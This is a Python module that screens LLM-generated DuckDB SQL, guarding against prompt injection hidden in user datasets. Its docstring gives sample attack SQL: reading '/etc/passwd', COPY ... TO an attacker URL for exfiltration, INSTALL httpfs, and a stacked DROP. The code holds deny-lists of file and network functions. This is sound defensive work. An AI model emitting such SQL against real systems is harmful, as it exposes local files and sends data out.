""" SQL safety guard for LLM-generated queries. The LLM (or *indirect* prompt-injection hidden inside a user's dataset) can be coerced into emitting SQL that does far more than answer a question — reading local files (`read_text('/etc/passwd')`), exfiltrating data (`COPY ... TO 'http://attacker'`), loading network extensions (`INSTALL httpfs`), or stacking a `DROP`. Because the executor runs whatever SQL it is handed, this module is the hard boundary that turns a *tricked* model into a *harmless* one. Design priority: block dangerous SQL WITHOUT rejecting legitimate analytical queries (JOINs, CTEs, window functions, aggregates, sub-queries, UNIONs). How it stays safe *and* permissive ---------------------------------- 1. **Single statement only.** After masking out string literals / comments we split on `;`. More than one statement → blocked. This kills stacked-query attacks (`SELECT 1; DROP TABLE x`). 2. **Must start with SELECT / WITH / FROM / VALUES / DESCRIBE / SUMMARIZE.** Every dangerous *statement* (COPY, ATTACH, INSTALL, SET, PRAGMA, INSERT, UPDATE, DELETE, DROP, CREATE, …) is its own leading keyword, so a single statement that starts with SELECT simply cannot be one of them. This avoids a keyword deny-list, which would false-positive on column names like `load` or scalar functions like `REPLACE()`. 3. **File/network function deny-list**, matched as ``name(`` on the string-masked SQL — so a value like ``'COPY paper'`` or ``read_csv`` used as a bare identifier never trips it. 4. **Row-cap.** A `LIMIT` is appended when the query has none, bounding result size / cost. (The DuckDB connection sandbox in the executor is the second, independent backstop for file/network access.) """ import logging import re logger = logging.getLogger(__name__) # Hard cap on returned rows when the query specifies no LIMIT of its own. # Generous on purpose: the pipeline already samples charts to 1000 points and # tables to 30–500 rows, so this only ever trips on pathological/huge results. DEFAULT_ROW_CAP = 200_000 # A single statement may only begin with one of these (read-only, row-returning). _ALLOWED_START = re.compile(r"^\s*\(*\s*(SELECT|WITH|FROM|VALUES|TABLE|DESCRIBE|SUMMARIZE)\b", re.IGNORECASE) # File-system / network / system access functions. Matched as ``name(``. _FORBIDDEN_FUNCTIONS = { "read_csv", "read_csv_auto", "read_parquet", "read_json", "read_json_auto", "read_ndjson", "read_ndjson_auto", "read_text", "read_blob", "read_xlsx", "parquet_scan", "csv_scan", "json_scan", "scan_csv", "from_csv_auto", "sniff_csv", "parquet_metadata", "parquet_schema", "parquet_file_metadata", "glob", "delta_scan", "iceberg_scan", "iceberg_metadata", "postgres_scan", "postgres_query", "sqlite_scan", "sqlite_query", "mysql_scan", "mysql_query", "shellfs", "install_extension", "load_extension", } _FORBIDDEN_FUNC_RE = re.compile( r"\b(" + "|".join(re.escape(f) for f in _FORBIDDEN_FUNCTIONS) + r")\s*\(", re.IGNORECASE, ) # Belt-and-braces: even inside a SELECT these tokens must never appear. # COPY ... TO → exfiltration | INTO → SELECT-INTO table creation _FORBIDDEN_TOKEN_RE = re.compile(r"\b(COPY|ATTACH|DETACH|INSTALL|PRAGMA)\b", re.IGNORECASE) class SQLGuardResult: """Outcome of a guard check.""" __slots__ = ("ok", "sql", "reason") def __init__(self, ok: bool, sql: str = "", reason: str = ""): self.ok = ok self.sql = sql # cleaned SQL safe to execute (LIMIT enforced) self.reason = reason # human-readable block reason (when ok is False) def _strip_markdown_fence(sql: str) -> str: """Remove a ```sql ... ``` fence the LLM occasionally wraps SQL in.""" s = sql.strip() if s.startswith("```"): s = re.sub(r"^```[a-zA-Z]*\s*", "", s) if s.endswith("```"): s = s[:-3] return s.strip() def _mask(sql: str) -> str: """ Return a copy of ``sql`` with string literals, quoted identifiers and comments replaced by neutral placeholders, so keyword/function scanning and statement splitting only see *structural* SQL — never user/data text. Note: unterminated quotes and unknown dollar-quotes are left as-is, which only makes the scan *more* conservative (fails closed), never less. """ out = [] i, n = 0, len(sql) while i < n: c = sql[i] # line comment -- ... if c == "-" and i + 1 < n and sql[i + 1] == "-": j = sql.find("\n", i) if j == -1: break i = j continue # block comment /* ... */ if c == "/" and i + 1 < n and sql[i + 1] == "*": j = sql.find("*/", i + 2) i = (j + 2) if j != -1 else n out.append(" ") continue # single-quoted string literal (with '' escape) if c == "'": i += 1 while i < n: if sql[i] == "'": if i + 1 < n and sql[i + 1] == "'": i += 2 continue i += 1 break i += 1 out.append("'s'") # placeholder literal continue # double-quoted identifier (with "" escape) if c == '"': i += 1 while i < n: if sql[i] == '"': if i + 1 < n and sql[i + 1] == '"': i += 2 continue i += 1 break i += 1 out.append(" _id_ ") # placeholder identifier continue out.append(c) i += 1 return "".join(out) def _split_statements(masked: str): """Split masked SQL on top-level ';' and return non-empty statements.""" parts = [p.strip() for p in masked.split(";")] return [p for p in parts if p] def validate_sql(sql: str, row_cap: int = DEFAULT_ROW_CAP) -> SQLGuardResult: """ Validate an LLM-generated SQL string. Returns a SQLGuardResult. When ``ok`` is True, ``sql`` is the cleaned query (markdown fence removed, trailing ';' stripped, LIMIT enforced) and is safe to execute. When ``ok`` is False, ``reason`` explains why it was blocked. """ if not sql or not sql.strip(): return SQLGuardResult(False, reason="Empty SQL") cleaned = _strip_markdown_fence(sql) masked = _mask(cleaned) # 1) Exactly one statement (kills stacked-query injection) statements = _split_statements(masked) if len(statements) > 1: return SQLGuardResult(False, reason="Multiple SQL statements are not allowed") if not statements: return SQLGuardResult(False, reason="No executable SQL statement found") masked_stmt = statements[0] # 2) Must be a read-only, row-returning statement if not _ALLOWED_START.match(masked_stmt): return SQLGuardResult( False, reason="Only read-only SELECT queries are allowed", ) # 3) No file/network access functions or exfiltration tokens m = _FORBIDDEN_FUNC_RE.search(masked_stmt) if m: return SQLGuardResult(False, reason=f"Disallowed function: {m.group(1)}()") m = _FORBIDDEN_TOKEN_RE.search(masked_stmt) if m: return SQLGuardResult(False, reason=f"Disallowed operation: {m.group(1)}") # 4) Enforce a row cap when the query has no LIMIT/FETCH of its own. safe_sql = cleaned.rstrip().rstrip(";").rstrip() has_limit = re.search(r"\b(LIMIT|FETCH)\b", masked_stmt, re.IGNORECASE) is not None if not has_limit and row_cap and row_cap > 0: # New line guarantees the LIMIT is never swallowed by a trailing comment. safe_sql = f"{safe_sql}\nLIMIT {int(row_cap)}" return SQLGuardResult(True, sql=safe_sql)